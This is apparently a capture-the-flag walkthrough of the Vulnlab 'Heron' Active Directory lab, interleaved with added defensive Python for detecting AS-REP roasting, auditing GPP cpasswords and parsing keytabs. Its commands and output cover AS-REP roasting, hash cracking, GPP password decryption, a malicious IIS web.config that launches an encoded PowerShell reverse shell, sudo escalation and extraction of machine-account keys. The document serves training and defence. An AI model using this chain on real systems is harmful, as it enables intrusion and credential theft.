</html>                                                                                      
┌──(puck㉿kali)-[~/vulnlab/heron]

We add the DC to our /etc/hosts:

10.10.148.85 mucdc.heron.vl heron.vl

Check for AS-REP roastable users (AD accounts with the option "Do not require Kerberos preauthentication" set):

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 impacket-GetNPUsers heron.vl/'Guest' -dc-ip 10.10.148.85 -no-pass -request -usersfile users.txt      
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User svc-web-accounting-d doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User svc-web-accounting doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User wayne.wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[-] User julian.pratt doesn't have UF_DONT_REQUIRE_PREAUTH set
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
$krb5asrep$23$samuel.davies@HERON.VL:5253809049f054f80bde543e1a85bd56$d72a41d4e4a470a8abb50153b4cf1b365c82e8d0be2c8b376559f2ceaeda11962b2ca2eb37e0fa3feae5cad46f8da6c4abc5d15c32a2b66651c5846f21755d587d8996a83f9e34bddd777f420f6da1061da0c33fd594c0432c9cf69ad6fb7c881858578ca9870cefffaf7c0a34f9deca4209cdf8a0e0a9b971a32e01744bc98c1f69d1dfd32d19e95124c7f9603adc9b139971aad3354ea4e2a1d1e23df6bb70fa57d9e967c98972058a1510e3b8f5ff0c55e45f35478fa0437e1119d2ad36e4d54d2695a6f545ea0a8f46b3b053a154f61d66fa8755d7d8676d71ec6f45aa40163b2101
[-] invalid principal syntax
                                                                                      
┌──(puck㉿kali)-[~/vulnlab/heron]
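
On the DC side the roast above leaves a trail in the Security log: event 4768 (a TGT was requested) with Pre-Authentication Type 0 and, for the RC4 case, Ticket Encryption Type 0x17, plus a burst of requests for different account names from one source while the user list is probed (the KDC_ERR_C_PRINCIPAL_UNKNOWN and KDC_ERR_CLIENT_REVOKED answers above correspond to result codes 0x6 and 0x12). The Python below is an added detection example, not from the writeup: it parses constructed 4768 records flattened to key=value lines and applies both checks. The log lines, the account names other than samuel.davies, and the threshold are assumptions made for the example.

```python
from collections import defaultdict
from typing import Optional

# Constructed Security-log records (event 4768, "A Kerberos authentication
# ticket (TGT) was requested") flattened to key=value lines; they are not the
# DC's real logs. Field names follow the event's EventData names and the IPs
# are in the IPv4-mapped IPv6 form the event uses.
SAMPLE_4768 = """\
EventID=4768;TargetUserName=wayne.wood;ServiceName=krbtgt;TicketEncryptionType=0x12;PreAuthType=2;IpAddress=::ffff:10.10.148.50;Status=0x0
EventID=4768;TargetUserName=nobody;ServiceName=krbtgt;TicketEncryptionType=0xffffffff;PreAuthType=-;IpAddress=::ffff:10.10.148.86;Status=0x6
EventID=4768;TargetUserName=old.account;ServiceName=krbtgt;TicketEncryptionType=0xffffffff;PreAuthType=-;IpAddress=::ffff:10.10.148.86;Status=0x12
EventID=4768;TargetUserName=samuel.davies;ServiceName=krbtgt;TicketEncryptionType=0x17;PreAuthType=0;IpAddress=::ffff:10.10.148.86;Status=0x0
EventID=4768;TargetUserName=svc-legacy;ServiceName=krbtgt;TicketEncryptionType=0x12;PreAuthType=0;IpAddress=::ffff:10.10.148.86;Status=0x0
"""

RC4_HMAC = 0x17      # etype 23, the case hashcat mode 18200 cracks fastest
NO_PREAUTH = 0       # PreAuthType 0: the KDC issued the ticket without pre-authentication


def _int(value: str) -> Optional[int]:
    """Parse '0x17', '2' or '-' (failed requests carry '-' in several fields)."""
    try:
        return int(value, 0)
    except ValueError:
        return None


def parse_events(text: str) -> list[dict]:
    """Turn the flattened key=value lines into dicts, unmapping ::ffff: addresses."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ev = dict(kv.split("=", 1) for kv in line.split(";"))
        ip = ev.get("IpAddress", "")
        ev["IpAddress"] = ip[7:] if ip.startswith("::ffff:") else ip
        events.append(ev)
    return events


def asrep_roast_alerts(events: list[dict]) -> list[dict]:
    """Flag TGTs issued without pre-authentication.

    The AS-REP for such an account is encrypted with the user's own key and
    can be cracked offline; RC4 (0x17) is the fast case, AES is slower but the
    exposure is the same, so it is reported at a lower severity.
    """
    alerts = []
    for ev in events:
        if ev.get("EventID") != "4768" or _int(ev.get("Status", "-")) != 0:
            continue
        if _int(ev.get("PreAuthType", "-")) != NO_PREAUTH:
            continue
        etype = _int(ev.get("TicketEncryptionType", "-"))
        alerts.append({"user": ev["TargetUserName"], "source": ev["IpAddress"],
                       "etype": etype, "severity": "high" if etype == RC4_HMAC else "medium"})
    return alerts


def kerberos_user_enum(events: list[dict], threshold: int = 3) -> dict[str, int]:
    """Count distinct account names each source asked the KDC about, successes
    and failures (0x6 client unknown, 0x12 client revoked) alike; one host
    touching many names is the user-enumeration pattern."""
    names = defaultdict(set)
    for ev in events:
        if ev.get("EventID") == "4768":
            names[ev["IpAddress"]].add(ev["TargetUserName"].lower())
    return {ip: len(users) for ip, users in names.items() if len(users) >= threshold}


if __name__ == "__main__":
    evs = parse_events(SAMPLE_4768)
    for a in asrep_roast_alerts(evs):
        print(f"[{a['severity']}] no-preauth TGT for {a['user']} from {a['source']} (etype {a['etype']:#x})")
    for ip, n in kerberos_user_enum(evs).items():
        print(f"[enum] {ip} requested tickets for {n} distinct accounts")
```

The durable fix is to clear "Do not require Kerberos preauthentication" on every account that has it and to disable RC4 for the remaining ones; the detection above is what tells you when someone has started looking for the accounts you missed.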

We crack this with hashcat; AS-REP Roasting hashes use hashcat mode 18200:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ hashcat -m 18200 -o cracked4.txt hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting


Host memory required for this attack: 2 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$samuel.davies@HERON.VL:5253809049f054...3b2101
Time.Started.....: Fri Aug  2 15:06:30 2024 (0 secs)
Time.Estimated...: Fri Aug  2 15:06:30 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)

Started: Fri Aug  2 15:06:29 2024
Stopped: Fri Aug  2 15:06:32 2024

With the password found, we run a BloodHound enumeration:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 bloodhound-python -d 'heron.vl' -u 'samuel.davies' -p 'l6<redacted>oN' -c all -ns 10.10.148.85 --zip 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
INFO: Found AD domain: heron.vl
INFO: Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
INFO: Connecting to LDAP server: mucdc.heron.vl
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 5 computers
INFO: Connecting to LDAP server: mucdc.heron.vl
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK
INFO: Found 28 users
INFO: Found 59 groups
INFO: Found 5 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: frajmp.heron.vl
INFO: Querying computer: 
INFO: Querying computer: 
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.86:445 INFO: Querying computer: 
INFO: Querying computer: mucdc.heron.vl
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445 <--socket error or timeout!
 ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
INFO: Done in 00M 07S
INFO: Compressing output into 20240802151131_bloodhound.zip

Getting more users with an LDAP dump:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 ldapsearch -x -LLL -H ldap://mucdc.heron.vl -D 'samuel.davies@heron.vl' -b 'DC=heron,DC=vl' -w 'l6<redacted>oN' | grep userPrincipalName | awk '{print $2}' | cut -d '@' -f 1 > allusers.txt 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:389  ...  OK

SMB enumeration:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient -L 10.10.148.85 -U 'samuel.davies'   
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
Password for [WORKGROUP\samuel.davies]:

    Sharename       Type      Comment
    ---------       ----      -------
    accounting$     Disk      
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    CertEnroll      Disk      Active Directory Certificate Services share
    home$           Disk      
    IPC$            IPC       Remote IPC
    it$             Disk      
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
    transfer$       Disk      
Reconnecting with SMB1 for workgroup listing.
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:139  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:139  ...  OK
do_connect: Connection to 10.10.148.85 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Connecting to SMB, we find Groups.xml with a password in it:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\SYSVOL -U 'samuel.davies'   
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\samuel.davies]:
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun May 26 11:37:40 2024
  ..                                  D        0  Sun May 26 11:37:40 2024
  heron.vl                           Dr        0  Sun May 26 11:37:40 2024

        6261499 blocks of size 4096. 1958913 blocks available
smb: \> cd heron.vl
smb: \heron.vl\> ls
  .                                   D        0  Sun May 26 11:38:59 2024
  ..                                  D        0  Sun May 26 11:37:40 2024
  DfsrPrivate                      DHSr        0  Sun May 26 11:38:59 2024
  Policies                            D        0  Tue Jun  4 17:57:41 2024
  scripts                             D        0  Sun Jun  2 12:42:56 2024

        6261499 blocks of size 4096. 1958913 blocks available
smb: \heron.vl\> cd Policies
smb: \heron.vl\Policies\> ls
  .                                   D        0  Tue Jun  4 17:57:41 2024
  ..                                  D        0  Sun May 26 11:38:59 2024
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sun May 26 11:37:44 2024
  {3FFDA928-A6D1-4860-936F-25D9D2D7EAEF}      D        0  Sun May 26 12:21:54 2024
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sun May 26 11:37:44 2024
  {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}      D        0  Tue Jun  4 17:57:41 2024
  {866ECED1-24B0-46EF-92F5-652345A1820C}      D        0  Sun May 26 12:23:29 2024

        6261499 blocks of size 4096. 1958912 blocks available
smb: \heron.vl\Policies\> cd {6CC75E8D-586E-4B13-BF80-B91BEF1F221C}
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> ls
  .                                   D        0  Tue Jun  4 17:57:41 2024
  ..                                  D        0  Tue Jun  4 17:57:41 2024
  GPT.INI                             A       59  Tue Jun  4 18:00:13 2024
  Machine                             D        0  Tue Jun  4 17:59:44 2024
  User                                D        0  Tue Jun  4 17:57:41 2024

        6261499 blocks of size 4096. 1958910 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\> cd Machine
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:57:41 2024
  Preferences                         D        0  Tue Jun  4 17:59:44 2024

        6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\> cd Preferences
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:59:44 2024
  Groups                              D        0  Tue Jun  4 17:59:44 2024

        6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\> cd Groups
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> ls
  .                                   D        0  Tue Jun  4 17:59:44 2024
  ..                                  D        0  Tue Jun  4 17:59:44 2024
  Groups.xml                          A     1135  Tue Jun  4 18:01:07 2024

        6261499 blocks of size 4096. 1958908 blocks available
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> get Groups.xml
getting file \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\Groups.xml of size 1135 as Groups.xml (13.2 KiloBytes/sec) (average 13.2 KiloBytes/sec)
smb: \heron.vl\Policies\{6CC75E8D-586E-4B13-BF80-B91BEF1F221C}\Machine\Preferences\Groups\> 

Decrypting the GPP cpassword with gpp-decrypt (the tool needs pycryptodome and colorama):

pip3 install pycryptodome colorama
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py 

                               __                                __ 
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/ 
/___/  /_/    /_/                                /___/  /_/         

usage: python3 gpp-decrypt.py -f [groups.xml]
gpp-decrypt.py: error: one of the arguments -f/--file -c/--cpassword is required
puck@edge-meppel:~/gpp-decrypt$ python3 gpp-decrypt.py -c 1G19pP9gbIPUr5xLeKhEUg==

                               __                                __ 
  ___ _   ___    ___  ____ ___/ / ___  ____  ____  __ __   ___  / /_
 / _ `/  / _ \  / _ \/___// _  / / -_)/ __/ / __/ / // /  / _ \/ __/
 \_, /  / .__/ / .__/     \_,_/  \__/ \__/ /_/    \_, /  / .__/\__/ 
/___/  /_/    /_/                                /___/  /_/         

[ * ] Password: H3<redacted>#!
puck@edge-meppel:~/gpp-decrypt$
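
Group Policy Preferences encrypts cpassword with a fixed AES key that Microsoft published in its own documentation, so any cpassword readable in SYSVOL is plaintext-equivalent for every domain user; MS14-025 stopped Windows from writing new ones but does not remove files already there. The Python below is an added audit example, not code from the writeup or from gpp-decrypt: it walks a SYSVOL tree (here a constructed dict of path to content with made-up GUIDs, names and values) and reports every preference file still carrying a cpassword, without decrypting anything.

```python
import re
import xml.etree.ElementTree as ET

# Constructed stand-in for a SYSVOL tree, as {relative path: file content}.
# GPO GUIDs, account names, uids and the cpassword value are made up for the
# example; they are not the ones from the heron.vl share.
SAMPLE_SYSVOL = {
    "heron.vl/Policies/{11111111-2222-3333-4444-555555555555}/Machine/Preferences/Groups/Groups.xml": """\
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="svc-example" image="2" changed="2024-06-04 16:01:07" uid="{aaaaaaaa-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description="" cpassword="EXAMPLEcpasswordBASE64value==" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" userName="svc-example"/>
  </User>
</Groups>
""",
    "heron.vl/Policies/{11111111-2222-3333-4444-555555555555}/GPT.INI": "[General]\nVersion=3\n",
    "heron.vl/Policies/{22222222-2222-3333-4444-555555555555}/Machine/Preferences/Groups/Groups.xml": """\
<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="localadmin" image="1" changed="2024-05-26 10:21:54" uid="{aaaaaaaa-0000-0000-0000-000000000002}">
    <Properties action="D" newName="" fullName="" description="" userName="localadmin"/>
  </User>
</Groups>
""",
}

# Preference files whose items may carry an embedded cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
GPO_GUID = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")


def gpo_of(path: str) -> str:
    """Return the GPO GUID folder a SYSVOL path belongs to, or '' if none."""
    match = GPO_GUID.search(path)
    return match.group(0) if match else ""


def audit_gpp(files: dict[str, str]) -> list[dict]:
    """Report every GPP item that still carries a cpassword attribute."""
    findings = []
    for path, content in files.items():
        if path.rsplit("/", 1)[-1] not in GPP_FILES:
            continue
        try:
            root = ET.fromstring(content)
        except ET.ParseError as exc:
            findings.append({"path": path, "gpo": gpo_of(path), "item": "", "account": "",
                             "changed": "", "problem": f"unparseable XML: {exc}"})
            continue
        # Items are the children of the root (User, Group, NTService, Task, ...);
        # the Properties child of each item is where cpassword lives.
        for item in root:
            for props in item.iter():
                if not props.get("cpassword"):
                    continue
                account = (props.get("userName") or props.get("accountName")
                           or props.get("runAs") or item.get("name", ""))
                findings.append({"path": path, "gpo": gpo_of(path), "item": item.tag,
                                 "account": account, "changed": item.get("changed", ""),
                                 "problem": "cpassword present (plaintext-equivalent)"})
    return findings


if __name__ == "__main__":
    for f in audit_gpp(SAMPLE_SYSVOL):
        print(f"{f['gpo']} {f['item']} {f['account']!r} (changed {f['changed']}): {f['problem']}")
        print(f"    {f['path']}")
```

Remediation is to delete the offending preference item (or the whole GPO) and rotate the account's password, since every domain user who could read SYSVOL must be assumed to have it; the `changed` timestamp tells you how long the exposure has lasted.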

With the H3<redacted>#! password, valid for user svc-web-accounting-d, we can access SMB:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains4 smbclient \\\\10.10.148.85\\accounting$ -U 'svc-web-accounting-d'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Password for [WORKGROUP\svc-web-accounting-d]:H3r<redacted>#!
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.148.85:445  ...  OK
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun  7 08:14:04 2024
  ..                                DHS        0  Sun Jun  2 17:26:14 2024
  AccountingApp.deps.json             A    37407  Sun Jun  2 21:25:26 2024
  AccountingApp.dll                   A    89600  Sun Jun  2 21:25:26 2024
  AccountingApp.exe                   A   140800  Sun Jun  2 21:25:26 2024
  AccountingApp.pdb                   A    39488  Sun Jun  2 21:25:26 2024
  AccountingApp.runtimeconfig.json      A      557  Sun Jun  2 00:22:20 2024
  appsettings.Development.json        A      127  Sun Jun  2 00:00:54 2024
  appsettings.json                    A      237  Sun Jun  2 00:03:50 2024
  FinanceApp.db                       A   106496  Sat Jun  1 16:09:00 2024
  Microsoft.AspNetCore.Authentication.Negotiate.dll      A    53920  Wed Nov  1 10:08:26 2023
  Microsoft.AspNetCore.Cryptography.Internal.dll      A    52912  Mon May 20 14:23:52 2024
  Microsoft.AspNetCore.Cryptography.KeyDerivation.dll      A    23712  Mon May 20 14:23:56 2024
  Microsoft.AspNetCore.Identity.EntityFrameworkCore.dll      A   108808  Mon May 20 14:24:24 2024
  Microsoft.Data.Sqlite.dll           A   172992  Mon May 20 09:54:40 2024
  Microsoft.EntityFrameworkCore.Abstractions.dll      A    34848  Mon May 20 09:54:30 2024
  Microsoft.EntityFrameworkCore.dll      A  2533312  Mon May 20 09:55:04 2024
  Microsoft.EntityFrameworkCore.Relational.dll      A  1991616  Mon May 20 09:55:20 2024
  Microsoft.EntityFrameworkCore.Sqlite.dll      A   257456  Mon May 20 09:55:30 2024
  Microsoft.Extensions.DependencyModel.dll      A    79624  Tue Oct 31 23:59:24 2023
  Microsoft.Extensions.Identity.Core.dll      A   177840  Mon May 20 14:24:10 2024
  Microsoft.Extensions.Identity.Stores.dll      A    45232  Mon May 20 14:24:20 2024
  Microsoft.Extensions.Options.dll      A    64776  Thu Jan 18 12:05:26 2024
  runtimes                            D        0  Sat Jun  1 16:51:32 2024
  SQLitePCLRaw.batteries_v2.dll       A     5120  Thu Aug 24 04:41:24 2023
  SQLitePCLRaw.core.dll               A    50688  Thu Aug 24 04:38:38 2023
  SQLitePCLRaw.provider.e_sqlite3.dll      A    35840  Thu Aug 24 04:38:52 2023
  System.DirectoryServices.Protocols.dll      A    71944  Wed Nov  1 00:00:24 2023
  web.config                          A      554  Thu Jun  6 16:41:39 2024
  wwwroot                             D        0  Sat Jun  1 16:51:32 2024

        6261499 blocks of size 4096. 1957663 blocks available
smb: \> 


We remove web.config and upload a modified one. IIS's ASP.NET Core Module (AspNetCoreModuleV2) in OutOfProcess hosting mode simply launches whatever processPath and arguments point at, so write access to an IIS application's web.config is code execution as the application pool identity. The handler is bound to the path execute.now, so nothing runs until that URL is requested.

I used this one:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
<location path="." inheritInChildApplications="false">
    <system.webServer>
    <handlers>
        <add name="aspNetCore" path="execute.now" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
    </handlers>
    <aspNetCore processPath="powershell" arguments="-e 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" hostingModel="OutOfProcess" />
    </system.webServer>
</location>
</configuration>
<!--ProjectGuid: 803424B4-7DFD-4F1E-89C7-4AAC782C27C4-->

Then I opened http://accounting.heron.vl in a proxychains'd Firefox, logged in as svc-web-accounting-d with the H3<redacted>#! password, and visited http://accounting.heron.vl/execute.now to trigger the handler,

or trigger it with curl:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ proxychains curl -u:svc-web-accounting:H3<redacted>#! http://accounting.heron.vl/execute.now
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  accounting.heron.vl:80  ...  OK


and caught the reverse shell on my Kali box:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ nc -nlvp 9001                
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.177.37] 58560

PS C:\webaccounting> cd c:\windows\scripts
PS C:\windows\scripts> dir


    Directory: C:\windows\scripts


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----          6/6/2024   7:12 AM           1416 dns.ps1                                                              
-a----          6/1/2024   8:26 AM            221 ssh.ps1                                                              


PS C:\windows\scripts> type ssh.ps1
$plinkPath = "C:\Program Files\PuTTY\plink.exe"
$targetMachine = "frajmp"
$user = "_local"
$password = "De<redacted>lt"
& "$plinkPath" -ssh -batch $user@$targetMachine -pw $password "ps auxf; ls -lah /home; exit"
PS C:\windows\scripts>                      

Get-MpComputerStatus shows Defender is running on MUCDC, and the session gets killed after about a minute; if you need more time, request http://accounting.heron.vl/execute.now again.

Privilege escalation on the Ubuntu box (frajmp), using the _local password from ssh.ps1

pentest@frajmp:/tmp$ su _local
Password: 
_local@frajmp:/tmp$ sudo -l
[sudo] password for _local: 
Matching Defaults entries for _local on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User _local may run the following commands on localhost:
    (ALL : ALL) ALL
_local@frajmp:/tmp$ sudo su
root@frajmp:/tmp# cd /root
root@frajmp:~# ls
flag.txt  snap
root@frajmp:~# cat flag.txt
VL{51<redacted>60}

Transfer /etc/krb5.keytab to the Kali box with nc and run keytabextract.py on it. The RC4-HMAC (etype 23) key in a keytab is the NT hash of the account's password, so the machine account FRAJMP$ can now be used with pass-the-hash as well as with Kerberos:

┌──(puck㉿kali)-[~/vulnlab/heron]
└─$ python3 keytabextract.py krb5.keytab           
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
    REALM : HERON.VL
    SERVICE PRINCIPAL : FRAJMP$/
    NTLM HASH : 6f<redacted>f7
    AES-256 HASH : 7be44e62e24ba5f4a5024c185ade0cd3056b600bb9c69f11da3050dd586130e7
    AES-128 HASH : dcaaea0cdc4475eee9bf78e6a6cbd0cd
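What keytabextract.py is doing, as an added example that is not part of the original writeup or of that tool: a minimal parser for the MIT keytab format (version 0x0502) that prints each entry's key per etype. The sample keytab is constructed in memory with made-up key bytes (only the principal name FRAJMP$@HERON.VL is taken from the page); the script also accepts a real keytab path as its first argument.

```python
"""Minimal MIT keytab (format 0x0502) parser, with a constructed sample."""
import struct

ETYPE_NAMES = {23: "rc4-hmac (NT hash)", 17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96"}


def _counted(buf, off):
    """Read a counted_octet_string: uint16 big-endian length followed by the bytes."""
    (n,) = struct.unpack_from(">H", buf, off)
    return bytes(buf[off + 2:off + 2 + n]), off + 2 + n


def parse_keytab(blob):
    """Return one dict per live entry: principal, etype, kvno, key (hex)."""
    if blob[:2] != b"\x05\x02":
        raise ValueError("unsupported keytab version %r" % blob[:2])
    off, entries = 2, []
    while off + 4 <= len(blob):
        (size,) = struct.unpack_from(">i", blob, off)
        off += 4
        if size <= 0:                     # negative size marks a deleted slot of |size| bytes
            off += -size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", blob, off)
        off += 2
        realm, off = _counted(blob, off)
        comps = []
        for _ in range(ncomp):
            c, off = _counted(blob, off)
            comps.append(c.decode())
        _name_type, _timestamp, vno8 = struct.unpack_from(">IIB", blob, off)
        off += 9
        (etype,) = struct.unpack_from(">H", blob, off)
        off += 2
        key, off = _counted(blob, off)
        kvno = vno8
        if end - off >= 4:                # optional 32-bit vno overrides the 8-bit field when set
            (vno32,) = struct.unpack_from(">I", blob, off)
            kvno = vno32 or vno8
        off = end
        entries.append({
            "principal": "/".join(comps) + "@" + realm.decode(),
            "etype": etype,
            "etype_name": ETYPE_NAMES.get(etype, "etype %d" % etype),
            "kvno": kvno,
            "key": key.hex(),
        })
    return entries


def nt_hashes(entries):
    """The etype 23 key *is* the NT hash, directly usable for pass-the-hash."""
    return {e["principal"]: e["key"] for e in entries if e["etype"] == 23}


def build_keytab(entries):
    """Serialise (principal, etype, kvno, key) tuples into keytab 0x0502 bytes (used for the sample)."""
    out = bytearray(b"\x05\x02")
    for principal, etype, kvno, key in entries:
        name, realm = principal.rsplit("@", 1)
        comps = name.split("/")
        body = struct.pack(">H", len(comps))
        body += struct.pack(">H", len(realm)) + realm.encode()
        for c in comps:
            body += struct.pack(">H", len(c)) + c.encode()
        body += struct.pack(">IIB", 1, 0, kvno & 0xFF)   # name_type KRB5_NT_PRINCIPAL, timestamp, vno8
        body += struct.pack(">HH", etype, len(key)) + key
        body += struct.pack(">I", kvno)
        out += struct.pack(">i", len(body)) + body
    return bytes(out)


# Constructed sample: made-up keys for the page's machine account principal.
SAMPLE_KEYTAB = build_keytab([
    ("FRAJMP$@HERON.VL", 23, 2, bytes(range(16))),
    ("FRAJMP$@HERON.VL", 18, 2, bytes(range(32))),
])

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_KEYTAB
    for e in parse_keytab(blob):
        print("%-24s kvno=%-3d %-26s %s" % (e["principal"], e["kvno"], e["etype_name"], e["key"]))
```

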